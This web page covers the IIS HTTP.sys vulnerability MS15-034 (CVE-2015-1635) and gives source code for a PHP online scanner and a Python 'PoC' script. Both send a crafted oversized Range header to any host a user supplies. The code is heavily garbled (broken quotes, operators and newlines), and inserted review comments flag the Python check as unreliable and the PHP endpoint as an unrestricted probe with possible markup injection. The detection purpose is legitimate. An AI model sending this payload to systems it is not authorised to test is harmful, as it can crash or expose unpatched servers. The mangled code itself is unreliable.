Latest high-risk IIS vulnerability (CVE-2015-1635, MS15-034): PoC and online detection source code
HTTP.sys Remote Code Execution Vulnerability (CVE-2015-1635, MS15-034)
The remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys). It occurs when HTTP.sys incorrectly parses specially crafted HTTP requests. An attacker who successfully exploits this vulnerability can execute arbitrary code in the context of the System account. https://technet.microsoft.com/zh-cn/library/security/MS15-034
Online detection source code
PHP
/*
 * NOTE(review): this listing is a mangled paste — quote characters appear as
 * `';`, `::` appears as `:`, and `==` / `!==` appear as `=` / `! =` — so it is
 * annotated here rather than rewritten. Every comparison below (for example
 * `if ($ port = null)` and `if ($ status = false)`) must be confirmed against the
 * original before any reuse; as printed they would be assignments.
 *
 * Visible flow: a `host` GET parameter is read with FILTER_SANITIZE_URL, given an
 * `http://` scheme when none is present, and split into host and port (default
 * 80). A Memcached lookup under the key ms15034_<host>_<port> is tried first
 * (300 s, raised to 3600 s when the host is classified as PATCHED). On a miss the
 * server opens a TCP socket to host:port with a 5 s connect/stream timeout, sends
 * one GET carrying a very large Range header, reads the first 1024 bytes of the
 * reply and classifies it by substring matches into VulnStatus::VULN,
 * VULN_NOT_MS, PATCHED, NOT_VULN, NOT_VULN_MS, NOT_VULN_CF or FAIL, which
 * AsString() turns into the message shown on the page.
 *
 * Points for whoever hosts this checker:
 *  - the endpoint is unauthenticated and connects to whatever host:port the
 *    caller supplies, including loopback and private addresses reachable from
 *    the web server; restrict destinations (deny loopback/RFC 1918, allowlist
 *    ports) and rate-limit before exposing it.
 *  - VulnStatus::NOT_VULN_CF is used but not declared among the class constants,
 *    while `Limit` is declared and never used — confirm against the original.
 *  - `htmlspecialchars($url, ENT_HTML5)`: ENT_HTML5 alone selects no quote
 *    encoding, so `"` and `'` in the host are left as-is before $host is echoed
 *    into the form's value="" attribute further down; confirm parse_url() can
 *    never return a host containing quotes, or pass ENT_QUOTES as well.
 *  - the cache entry is written on the FAIL path too, so a transient connection
 *    failure is remembered for the full 300 s.
 */
Class VulnStatus {const FAIL = 0; const VULN = 1; const VULN_NOT_MS = 2; const PATCHED = 3; const NOT_VULN = 4; const NOT_VULN_MS = 5; const Limit = 6; public static function AsString ($ status, $ host) {switch ($ status) {case self: FAIL: return '; unable to connect ';. $ host. '; test the vulnerability. '; Case self: VULN: return';. $ host. '; the vulnerability exists. '; Case self: VULN_NOT_MS: return';. $ host. '; the vulnerability may exist, but it does not seem to use IIS. '; Case self: PATCHED: return';. $ host. '; fixed. '; Case self: NOT_VULN: return'; the patch status cannot be identified ';. $ host.';. IIS is not used and the vulnerability may not exist. '; Case self: NOT_VULN_MS: return'; the patch status cannot be identified ';. $ host.';. The vulnerability may not exist. '; Case self: NOT_VULN_CF: return';. $ host. '; CloudFlare CDN acceleration may be used, leading to vulnerability detection or non-existent. ';} Return'; seems to be broken '; ;}$ host = false; $ status = false; $ url = filter_input (INPUT_GET,'; host';, FILTER_SANITIZE_URL ); if (! Empty ($ url) & parse_url ($ url, PHP_URL_SCHEME) === null) {$ url = '; http ://';. $ url;} $ port = parse_url ($ url, PHP_URL_PORT); if ($ port = null) {$ port = 80 ;}$ url = parse_url ($ url, PHP_URL_HOST); if ($ url! = Null) {$ cachekey = '; ms15034 _';. $ url. ';_';. $ port; $ cachetime = 300; // 5 minutes $ host = htmlspecialchars ($ url, ENT_HTML5); if ($ port! = 80) {$ host. = ';:';. $ port;} $ memcached = new Memcached (); $ memcached-> addServer (';/var/run/memcached. sock ';, 0); $ status = $ memcached-> get ($ cachekey); if ($ status = false) {$ fp = @ fsockopen ($ url, $ port, $ errno, $ errstr, 5); if ($ fp = false) {$ status = VulnStatus: FAIL;} else {stream_set_timeout ($ fp, 5); $ header = "GET/HTTP/1.1 \ r \ n"; $ header. = "Host: stuff \ r \ n"; $ header. = "Rang E: bytes = 0-18446731673709551615 \ r \ n "; $ header. 
= "Connection: close \ r \ n"; fwrite ($ fp, $ header); $ response = fread ($ fp, 1024 ); fclose ($ fp); if (strpos ($ response, '; your request range does not match ';)! = False) {$ status = strpos ($ response, '; Microsoft';) = false? VulnStatus: VULN_NOT_MS: VulnStatus: VULN;} else if (strpos ($ response, '; Request an invalid header ';)! = False) {$ cachetime = 3600; // cache time $ status = VulnStatus: PATCHED;} else if (strpos ($ response, '; Microsoft ';) === false) {if (strpos ($ response, '; 403 Forbidden ';)! = False & strpos ($ response, '; cloudflare-nginx ';)! = False) {$ status = VulnStatus: NOT_VULN_CF;} else {$ status = VulnStatus: NOT_VULN ;}} else {$ status = VulnStatus: NOT_VULN_MS ;}} unset ($ fp, $ header, $ response); $ memcached-> set ($ cachekey, $ status, $ cachetime);} $ status = VulnStatus: AsString ($ status, $ host) ;}?> Charset = "UTF-8"> name = "theme-color" content = "#424242"> http-equiv = "X-UA-Compatible" content = "IE = edge, chrome = 1 "> name =" viewport "content =" width = device-width, initial-scale = 1.0 "> MS15-034 test href =" // maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css "rel =" stylesheet "> type =" text/css ">. container {max-width: 900px ;}. masthead {position: relative; padding: 20px 0; text-align: center; color: # fff; background-color: #424242; margin-bottom: 20px ;}. masthead a {color: # fff ;}. footer {text-align: center; padding: 15px; color: #555 ;}. footer span {color: # FA5994 ;}. form-inline {text-align: center; margin-bottom: 20px ;}. github {position: absolute; top: 0; right: 0 ;}
HTTP.sys Stack Vulnerability Test
Enter a URL or host name to test the server for [MS15-034](https://technet.microsoft.com/en-us/library/security/ms15-034.aspx) / [CVE-2015-1635](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635).
The HTTP protocol stack (HTTP.sys) is exposed to a remote code execution vulnerability when it incorrectly parses specially crafted HTTP requests. An attacker who successfully exploits this vulnerability can execute arbitrary code in the context of the System account.
To exploit this vulnerability, an attacker must send a specially crafted HTTP request to the affected system. The update resolves the vulnerability by changing how the Windows HTTP protocol stack processes requests.
Id = "js-form" method = "GET"> php if ($ host! = False) {echo '; value = "';. $ host. ';"' ;;}?>> Type = "submit" class = "btn-primary btn-lg"> detect php if ($ status! ==False) {echo $ status ;}?>
<!-- NOTE(review): mangled template fragment (the <form>/<input> tags and the <?php openers were lost). Visible behaviour: the form resubmits the page via GET, and the input is pre-filled with $host, which the PHP above produced with htmlspecialchars($url, ENT_HTML5) — a flag set that leaves quote characters unencoded, so confirm the host can never contain a quote before relying on this double-quoted value="" attribute. $status is the already-formatted message from VulnStatus::AsString() (fixed text plus that same $host) and is echoed as-is when it is not false. -->
Uses the Memcached distributed memory object caching system | all query results are cached for five minutes
Vulnerability verification PoC
Python version
#! /Usr/bin/env python _ author _ = '; jastra'; class bg_colors: VULN = '; 33 [92m'; NONVULN ='; 33 [95m '; EXPLOIT = '; 33 [91m'; try: import requests import retries t ImportError as ierr: print (bg_colors.EXPLOIT + "Error, looks like you don'; t have % s installed ", ierr) def identify_iis (domain): req = requests. get (str (domain) remote_server = req. headers ['; Server';] if "Microsoft-IIS" in remote_server: print (bg _ Colors. VULN + "[+] service is" + remote_server) ms15_034_test (str (domain) else: print (bg_colors.NONVULN + "[-] Not IIS \ n may be:" + remote_server) def ms15_034_test (domain): print ("START vuln check! ") Vuln_buffer =" GET/HTTP/1.1 \ r \ nHost: stuff \ r \ nRange: bytes = 0-18446731673709551615 \ r \ n "; req = requests. get (str (domain), params = vuln_buffer) if req. headers ['; content';] = "the request range does not match": print (bg_colors.EXPLOIT + "[+] vulnerability") else: print (bg_colors.EXPLOIT + "[-] IIS service cannot show whether the vulnerability exists. "+" manual detection required ") usr_domain = raw_input (" input domain name scan: ") identify_iis (usr_domain)
# NOTE(review): mangled paste — the shebang, the __author__ line, the ANSI colour
# constants (`33 [92m` etc.), the `except ImportError` clause, the quoting and the
# newlines are all garbled, so this is annotated rather than rewritten. It is
# Python 2 code (raw_input) and depends on the third-party `requests` package.
# Visible flow: identify_iis() GETs the given domain, reads the Server response
# header and, when that header contains "Microsoft-IIS", calls ms15_034_test();
# any other Server value is reported as "Not IIS". An absent Server header raises
# KeyError, and neither requests.get() call sets a timeout.
# ms15_034_test() hands the crafted request text to requests via `params=`, so it
# ends up in the URL query string rather than reaching the server as a Range
# header, and the verdict is then taken from a `content` response header — as
# printed, neither branch of its output is a reliable indicator of exposure.
# For an actual assessment, check the host's patch level against the MS15-034
# bulletin rather than trusting this script's output.